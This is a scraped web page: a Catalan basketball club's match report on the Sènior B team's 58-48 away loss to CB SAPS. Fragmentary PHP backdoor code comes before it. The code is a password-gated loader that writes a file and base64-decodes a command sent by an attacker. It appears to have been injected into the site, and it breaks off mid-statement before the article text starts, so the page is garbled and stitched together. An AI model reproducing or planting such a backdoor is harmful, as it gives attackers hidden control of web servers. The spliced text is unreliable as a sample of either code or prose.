function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Sènior B acusa les baixes i perd a domicili (58-48) - Tgn Bàsquet Club -

El Sènior B acusa les baixes i perd a domicili (58-48)

Updated: gener 17, 2024

El Sènior B va començar l’any amb un desplaçament complicat a la pista del CB SAPS, rival que venia en una molt bona dinàmica de resultats. El partit va començar amb un primer periode molt igualat, on l’intercanvi de cistelles va ser constant entre els dos equips. El resultat al final dels 10 primers minuts era de 14-13 favorable a l’equip barceloní.

Al segon quart, l’equip local va pujar l’intensitat i això va provocar que l’atac en estàtic de les liles col·lapsés, mentre que les barcelonines van seguir sumant des del tir lliure i van aconseguir una renda de 10 punts al descans (31-21).

Després del descans, el partit va tornar a ser un constant intercanvi de cops. Les visitants van trobar millors opcions en atac gràcies a diversos contratacs i jugades ràpides, però les barcelonines no permetien que el partit s’igualés. El TGN va seguir-ho intentant a l’últim quart, però la curta rotació de les liles (només comptaven amb 6 de les 12 jugadores) va fer que les jugadores notessin encara més el cansanci i els intents de remuntada s’acabessin ensorrant.